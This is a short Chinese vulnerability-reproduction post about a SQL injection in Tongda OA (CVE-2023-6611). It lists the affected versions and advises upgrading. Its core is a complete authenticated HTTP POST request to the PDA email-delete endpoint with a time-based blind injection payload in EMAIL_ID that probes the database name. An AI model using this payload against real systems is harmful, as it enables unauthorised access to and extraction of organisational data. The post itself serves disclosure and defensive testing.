【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6611)

admin 2023年12月14日10:32:21评论106 views字数 1094阅读3分38秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。


官网:
https://www.tongda2000.com/

漏洞编号:
CVE-2023-6611

影响范围:
通达OA >= 2017版
通达OA < 11.10

复现环境:
通达OA 2017版

0X02 漏洞复现
漏洞利用需登录。
POST /pda/pad/email/delete.php HTTP/1.1Host: 192.168.245.152User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 174Origin: http://192.168.245.152Connection: closeReferer: http://192.168.245.152/pda/pad/main.php?P=1;djdn42kbghtfftdtfdcnf663o4;&LOGIN_OKCookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=djdn42kbghtfftdtfdcnf663o4; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=6eb35161
EMAIL_ID=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1&A=delbox
A参数为delbox才能触发漏洞,右下角查看延时。
【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6611)
【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6611)
【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6611)

0X03 修复建议

升级至安全版本及其以上!

0X04

原文始发于微信公众号(皓月的笔记本):【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6611)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月14日10:32:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】通达OA SQL注入漏洞(CVE-2023-6611)https://cn-sec.com/archives/2296627.html

发表评论

匿名网友 填写信息